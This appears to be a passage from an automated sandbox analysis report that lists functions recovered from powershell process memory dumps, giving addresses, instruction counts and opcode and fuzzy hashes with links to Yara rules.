                        Memory Dump Source
                        • Source File: 00000008.00000002.2090605684.000000000357D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0357D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_357d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 454dc5426d4cc81fa2f7aa09acb5fec50164fa4f5304dcf247b3b30192a9b799
                        • Instruction ID: 1492a2d7875ec13a5445f8a01f191d0616925bdcde362b6dbe0dae049148fba6
                        • Opcode Fuzzy Hash: 454dc5426d4cc81fa2f7aa09acb5fec50164fa4f5304dcf247b3b30192a9b799
                        • Instruction Fuzzy Hash: 7621DEB1500300DFCB05CF14E9C5B26BF69FB88314F28C9EDE9090A266C33AD856CBA1
                        Function 04E7E208 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1dbbf913a8abcb1b2708d5f5f919d5c5d491a7963e3562c5933aa264b6bcd341
                        • Instruction ID: 2b1e732ba34dca3ba45ca15885ef077ff5f9fa21b4b4c57932cd77c845ea33b4
                        • Opcode Fuzzy Hash: 1dbbf913a8abcb1b2708d5f5f919d5c5d491a7963e3562c5933aa264b6bcd341
                        • Instruction Fuzzy Hash: CF2182B16002059FC704DF69E950A6AB7EAFF84314B10C52DD149CB665EB75E90ACBC0
                        Function 04E78BF8 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7362710ddcbc8c7735d58f2d26471f2c0e9d5a394e76f1b5ecc847e154ce7c3d
                        • Instruction ID: 47e80b907557c99825b893821d3fc8c525ccaeff19167c142f194dd83f9a27e7
                        • Opcode Fuzzy Hash: 7362710ddcbc8c7735d58f2d26471f2c0e9d5a394e76f1b5ecc847e154ce7c3d
                        • Instruction Fuzzy Hash: 8F218B74A017048EDB60EF6AD08838AFFF6FF98324F28C059D80DA7205D6746484CBA1
                        Function 04E7E1F9 Relevance: .1, Instructions: 65COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 783f5526dbb520eb3d03ffd2ab4bdc3d01d153df976e72dfdcb7953661d78f48
                        • Instruction ID: 5bba3f5003e0d6ba5c51c562c74699686bf5501cb421454e5715fe56143517df
                        • Opcode Fuzzy Hash: 783f5526dbb520eb3d03ffd2ab4bdc3d01d153df976e72dfdcb7953661d78f48
                        • Instruction Fuzzy Hash: 7D21CFB16002058FD305DB68E954B6ABBAAFF84310F14C56ED149CB6A1EB35AC098B80
                        Function 04E7DC38 Relevance: .1, Instructions: 64COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cf55cefc60116383317fd699553f347b467f421e684f838c52a533a84389092
                        • Instruction ID: 2d6e030770f0618259ca52fc5b7c8d401f6af9cccc929d724977546a9e804242
                        • Opcode Fuzzy Hash: 0cf55cefc60116383317fd699553f347b467f421e684f838c52a533a84389092
                        • Instruction Fuzzy Hash: 0521C039A00218DFC718EF69E418A9DBBB2BF88310F2485A9D5068B371CA31A844DB81
                        Function 0357ED53 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2090605684.000000000357D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0357D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_357d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                        • Instruction ID: 01f96fd5639ce9d150fb363c8b2833b5eea2b8a0e12f6efc205e32104d567c74
                        • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                        • Instruction Fuzzy Hash: C5218C76504240DFCB16CF10E9C4B16BF62FB48314F28C9E9DD494A266C33AD46ACBA1
                        Function 04E7F24F Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f484633c5a14145610b84cd5f715ad68082918619c5b67928f7019547dc436e2
                        • Instruction ID: fd674b5f1631aa2ac58ee31468fc58f2e4a8b53204478a9c5310f40264cbbc07
                        • Opcode Fuzzy Hash: f484633c5a14145610b84cd5f715ad68082918619c5b67928f7019547dc436e2
                        • Instruction Fuzzy Hash: 5E215B758042899EDB11CF99C844BEFBFF4EB09320F24844AE954A7241C339A954CFA1
                        Function 04E7816A Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7c29326013b652f6e73951640d4e10e51118eaa958b77d6544049d1bc279c7a6
                        • Instruction ID: deb2400e6a33dda14b72ac7800265136502496321634e40fc312649b4294f8d0
                        • Opcode Fuzzy Hash: 7c29326013b652f6e73951640d4e10e51118eaa958b77d6544049d1bc279c7a6
                        • Instruction Fuzzy Hash: 2601D43670421547DB086B74E4086AF7796EFC8735F04013AE50A87341DE79690683E6
                        Function 04E7AE58 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53fca03aaf92f9fa96731d78501091a2f51fb159bf207ce6719eba8514fd889e
                        • Instruction ID: 7890b65a3ec7bbc2330f4c1d1849c64ba7f8dc2f45fa02df7c52b3c49b6ce015
                        • Opcode Fuzzy Hash: 53fca03aaf92f9fa96731d78501091a2f51fb159bf207ce6719eba8514fd889e
                        • Instruction Fuzzy Hash: A611EC702047018FD705EB38E50465ABBA6FFCA21471885BEC48ACB720EB76E806CBC1
                        Function 04E788CF Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3056636f8965a003e4f5c15e9de5ce097f2530d98565836d90cb463198908016
                        • Instruction ID: 1be6509d4383bb5d8eeee4f98cd2d029cbc58a50d94b3dc06fcca27c6d773e03
                        • Opcode Fuzzy Hash: 3056636f8965a003e4f5c15e9de5ce097f2530d98565836d90cb463198908016
                        • Instruction Fuzzy Hash: 74117C75A043009BE704EF18D05879A77E2EFC4329F28D1B9D50D5F356DA36A846CB81
                        Function 04E78D3A Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e4eba070c2f592e46bd0db3e65af5b88cd953224a33d70c877699612facd830
                        • Instruction ID: 759c13b007e117c025d354a9bc4a90ce727c7ec6d3de12a7310dde47fdbaa751
                        • Opcode Fuzzy Hash: 3e4eba070c2f592e46bd0db3e65af5b88cd953224a33d70c877699612facd830
                        • Instruction Fuzzy Hash: 9EF0F437B002005BDB24B6ADB4483BDB7DAAFF5279F199066DA0CD7202DA38984583E0
                        Function 04E7AE68 Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4bc3c835d727a2d89069ada7f2d57d382fab412b8e21c6f28704fefe576deb6d
                        • Instruction ID: be908f807aa0019837bd18d47e73d3264222139ac9f94461315038113a43ce95
                        • Opcode Fuzzy Hash: 4bc3c835d727a2d89069ada7f2d57d382fab412b8e21c6f28704fefe576deb6d
                        • Instruction Fuzzy Hash: F501AD742007069BDB05EB38E504A5ABBE6FFCA264314853DC08A8B720DF76E802CBC0
                        Function 0357D01D Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2090605684.000000000357D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0357D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_357d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d1627032c838144b8c99d3db679affe35649fb4eef6fadad303f995f92ac8c89
                        • Instruction ID: 526fef9064a0b6548b4e7fa8ac6986cb7435467e743e7669c2ed8840c83114a7
                        • Opcode Fuzzy Hash: d1627032c838144b8c99d3db679affe35649fb4eef6fadad303f995f92ac8c89
                        • Instruction Fuzzy Hash: 6101F7310043409EE720CE26F984B67FFECFF46320F1CC869ED480A266D2799841CAB1
                        Function 0357D006 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2090605684.000000000357D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0357D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_357d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6df4924f9e5451d5156e399fcd6538e63625109cb273a5096b3c4fb7f494577b
                        • Instruction ID: 6a778b5150838c2276c38f741b6174ca7399208d023716e8490e545b077a8ef5
                        • Opcode Fuzzy Hash: 6df4924f9e5451d5156e399fcd6538e63625109cb273a5096b3c4fb7f494577b
                        • Instruction Fuzzy Hash: 7101407100E3C09FD7128B259C94B52BFB8EF57224F1D85DBD9888F2A3C2699844C772
                        Function 04E7C160 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 890943f55e9f3427c8372bd0de135ee3beb9902ab3c59e0fa6a963746b8fb987
                        • Instruction ID: 77248be241e5659cdeb79266969615e4f183d013d36a314eae7d96c980d744ba
                        • Opcode Fuzzy Hash: 890943f55e9f3427c8372bd0de135ee3beb9902ab3c59e0fa6a963746b8fb987
                        • Instruction Fuzzy Hash: CFF0C8363002145BE7089E7EA89479E779BEBC9331F108439E60AC7395DE7AD8458390
                        Function 04E7C14F Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2aa2bed193f4867b4cbb220d7ffa7d760b501fa7410eb3e56b403e02d26e68e1
                        • Instruction ID: dcf48eb9c149ad6c692293928a61737abfc1a6f96e72b574d5889051e3596133
                        • Opcode Fuzzy Hash: 2aa2bed193f4867b4cbb220d7ffa7d760b501fa7410eb3e56b403e02d26e68e1
                        • Instruction Fuzzy Hash: F6F028353083141BD7099E3AB8A479A7B9BAFC9324F14843AA6058B295DE6ADC458391
                        Function 04E75B30 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dcf1980f59aa1002b18e8e2ac0dfbd892d969fe0040925b172b8292b9a17609a
                        • Instruction ID: 58e025e7012bd662fb45b2c8967545498c2c692ccd6c69298d00ee8dd776fc68
                        • Opcode Fuzzy Hash: dcf1980f59aa1002b18e8e2ac0dfbd892d969fe0040925b172b8292b9a17609a
                        • Instruction Fuzzy Hash: FF01A4793501548FC706AB3CA45953D7BABFFCE62131480AAE446C7352CF788C028B91
                        Function 04E7F9EB Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e3f855f703c32361dcdd841e3f1b6180dc612075fc7dfee4bb3116e4c3fc036b
                        • Instruction ID: 483f68b4ca4a445ab421ab9942eb148adb548e12bd58fc9cdc1b87ec1d3f1155
                        • Opcode Fuzzy Hash: e3f855f703c32361dcdd841e3f1b6180dc612075fc7dfee4bb3116e4c3fc036b
                        • Instruction Fuzzy Hash: 1C01F6B56057449FC721DF6AE49049ABFF4EB9D220700866FE88AC7701D734EA058BA5
                        Function 04E778F8 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7ceced0b7695cd48e8977e245c6a4937fb9ea0f8be49155db1786ebfbfa66809
                        • Instruction ID: 4f4d5f9bb796de4c096887b09782fc2a2cce087e04b1d32f6afeda86038cc928
                        • Opcode Fuzzy Hash: 7ceced0b7695cd48e8977e245c6a4937fb9ea0f8be49155db1786ebfbfa66809
                        • Instruction Fuzzy Hash: 09F0F0353042058BCB14A629B40876E76ABFBC9234B008638D08E8B264EFB5A8468392
                        Function 04E75B40 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9abcbee98fe6560267eae318119225aeef36eb85b83f931f13568a256d9397d7
                        • Instruction ID: 8f87f79a51253ab161ead0381d47f572de97c88f55e18fbc256ce7f266b7171e
                        • Opcode Fuzzy Hash: 9abcbee98fe6560267eae318119225aeef36eb85b83f931f13568a256d9397d7
                        • Instruction Fuzzy Hash: ADF067797401148FC709AB2CA05953E77ABEBCE622310806AE807C3350CF389C028BA1
                        Function 04E75BBD Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8a9ac51629b2def63a4dd24e5a3e2f0113dc71439f85e210b1c20982374f3af2
                        • Instruction ID: dacc84e572bb51fbc1dbaac2c56488c8f8072010963781dfe3bf21ac8014bfcb
                        • Opcode Fuzzy Hash: 8a9ac51629b2def63a4dd24e5a3e2f0113dc71439f85e210b1c20982374f3af2
                        • Instruction Fuzzy Hash: 09011670A0020ADFCB84DFA8D842AAEBBF4FF08320F1059A9D509A7351D775A985CFC0
                        Function 04E7F9F8 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b3a3ca7065e46f04b1947a5fdce6d928a5f43144e7b6f316255dc1faa9da3a13
                        • Instruction ID: 4c0ad5270497c470ab0df61ce3696aeac42d22ec5a85958effaa1319b7d75d0d
                        • Opcode Fuzzy Hash: b3a3ca7065e46f04b1947a5fdce6d928a5f43144e7b6f316255dc1faa9da3a13
                        • Instruction Fuzzy Hash: 29F0A9B56007149F8760DF6EE48499ABBF5FB9C660700862EF88EC3701D734E9158BA5
                        Function 04E778E8 Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 602cf28e7aefa1ea95ef741c816c3d28254345633e777a05e1ee668eb20de68d
                        • Instruction ID: 2a72c0df8e6ea6d76110a52750e97d5a0559e4c7d05101b568d6d099007ae35b
                        • Opcode Fuzzy Hash: 602cf28e7aefa1ea95ef741c816c3d28254345633e777a05e1ee668eb20de68d
                        • Instruction Fuzzy Hash: ECF0553634D3404BC705636CB5181AE3FFAEBCB220B04816ED48ECB356DEA54C0A8392
                        Function 04E788E0 Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8b137471ba2aaa6c5cf5f78b0781ce1fd386a7b522b1ba0ba0a10ec98685ee1
                        • Instruction ID: 59136096eff168f8aecb3c7108650818ea7756b531ff90dd6b5bbe83d8a8fe5f
                        • Opcode Fuzzy Hash: f8b137471ba2aaa6c5cf5f78b0781ce1fd386a7b522b1ba0ba0a10ec98685ee1
                        • Instruction Fuzzy Hash: E5F0E2396002048BE309BB65E40C7AB77E6EFC4729F148169C60A4B384CE3A68068BE1
                        Function 04E78950 Relevance: .0, Instructions: 30COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: adf09cd501fd1c2d2b97af9f8c508882a0044cb340be88fc95c8b4d2fbf2d069
                        • Instruction ID: 31210d8bad4ff3a8e3273c7f53dc08c6155da623e11550f4016150c97b06a503
                        • Opcode Fuzzy Hash: adf09cd501fd1c2d2b97af9f8c508882a0044cb340be88fc95c8b4d2fbf2d069
                        • Instruction Fuzzy Hash: E1F0BE745043048FD360EFB4E49C79A7FE4EB45324F00456AD149CB292DB38A8808B92
                        Function 04E75605 Relevance: .0, Instructions: 27COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6714e0bb11ec9869de8a4716b94e2ae164af454e047d9474300857f108ac05b9
                        • Instruction ID: 4123f04cf088911f6f10ca43f37bd35b4034ab828c72b8b415b22b4de825b5a1
                        • Opcode Fuzzy Hash: 6714e0bb11ec9869de8a4716b94e2ae164af454e047d9474300857f108ac05b9
                        • Instruction Fuzzy Hash: 1FF0A070104205AFC705DB68D8816657BAEEF45344B1086A6E908CB261EB36DE03CBA0
                        Function 04E7FBB7 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9e4fb3d20a59d8515874d23d4f954ee8f52969d0cc39e7e588cc3c902c1e8c5
                        • Instruction ID: 7444e4da6ac3dfff1c914a724d842ce2221d727e1cdd043e62b935ed9273d58f
                        • Opcode Fuzzy Hash: e9e4fb3d20a59d8515874d23d4f954ee8f52969d0cc39e7e588cc3c902c1e8c5
                        • Instruction Fuzzy Hash: DDE09B3520834057D315A654F81CA57BB56DFC5310F25847E97554BB95CA258C1287A1
                        Function 04E78960 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1890c882dfcbdd277ac288aba74d848ee0d1a94830b72a4626d047118adeacd
                        • Instruction ID: edeb20243a933d9d55b5287802137eb76b31d599ed99f219decbfcfd60b9083f
                        • Opcode Fuzzy Hash: e1890c882dfcbdd277ac288aba74d848ee0d1a94830b72a4626d047118adeacd
                        • Instruction Fuzzy Hash: B8F06D309003048BD764EF78E09C79BBBE9FB88320F104529D14EC7340DF3968818B90
                        Function 04E7B1C0 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: addace11d9192e9d570cf87d493dc58efc3c96794a562f99a731ded4009a45bb
                        • Instruction ID: 7a3fd506d68888bb67a05f2fb664426f1d66a9b27c145c8c25a9882eb6ed2272
                        • Opcode Fuzzy Hash: addace11d9192e9d570cf87d493dc58efc3c96794a562f99a731ded4009a45bb
                        • Instruction Fuzzy Hash: 6ED02B337081941B1715953E7C205DA3BDB8FD2034308C0BBE508C7301EC429C0243E5
                        Function 04E78178 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 73c021327cb3a3d7d2b4ac401b9fdc392ba6faffcab2f28437cdb8c2ea413292
                        • Instruction ID: 14620361f9f0bfd707805a1bbce863ba8c6c269a5e767dca1322651d5b68273f
                        • Opcode Fuzzy Hash: 73c021327cb3a3d7d2b4ac401b9fdc392ba6faffcab2f28437cdb8c2ea413292
                        • Instruction Fuzzy Hash: B5E0863530471457CB1D7B75A41C6AE7A56EFC8735F044129E40B87341DFBD681683E6
                        Function 04E78D48 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f4360f7b6413fb2a1cce2af5a3f0aa9dcf9dc451ad7aa3bfb4a103385b64428
                        • Instruction ID: 7c5a3dce3e09d0610f393b84f228bf48032213352dc7d44cd1ce801d029338d5
                        • Opcode Fuzzy Hash: 8f4360f7b6413fb2a1cce2af5a3f0aa9dcf9dc451ad7aa3bfb4a103385b64428
                        • Instruction Fuzzy Hash: DBD05E1331022627162832AE281877FA1CE9FF55F97456136DB08D3246ED50EC0203F5
                        Function 04E7FC08 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 689255ef22306d1afb69c886be47d436821f5cb46730c5f2b1f25c7354e15d2b
                        • Instruction ID: 4cb03a9852068b91fb411488c897ddc05d8aadcd10ddab8e9a99637b6091ccde
                        • Opcode Fuzzy Hash: 689255ef22306d1afb69c886be47d436821f5cb46730c5f2b1f25c7354e15d2b
                        • Instruction Fuzzy Hash: 5CE04F71D01208AF8744DFACD6021E9FFF5AB48214B6485AAD818D7301F731AA528BD5
                        Function 04E77F38 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 464582f4f0b69fcd3a9822067c638ebaad45e6f7e158b61ac33e8998bd91b8e7
                        • Instruction ID: 0e9f558331bc62d093df307b5a4a481b99d7e5884707ab26b6fd30c568d831ae
                        • Opcode Fuzzy Hash: 464582f4f0b69fcd3a9822067c638ebaad45e6f7e158b61ac33e8998bd91b8e7
                        • Instruction Fuzzy Hash: 8AE04F3180010D8BC718ABA4F52B4FDBB34BE44215F80406AE90353A81EB283996CAC1
                        Function 04E75618 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8a8931a70b88561605c5323cbd211bfdbbd992974a9f66f4fc9e4badd66f48d3
                        • Instruction ID: 997ad21e0073bb5e796c3e588f4bc86b57d4c817253a73ce587014397203c1f7
                        • Opcode Fuzzy Hash: 8a8931a70b88561605c5323cbd211bfdbbd992974a9f66f4fc9e4badd66f48d3
                        • Instruction Fuzzy Hash: 44E04F70200205ABC705DFA9D850965B7AEEB48344B1486AAED08C7241EB32EA03CB90
                        Function 04E78002 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2091014004.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_4e70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
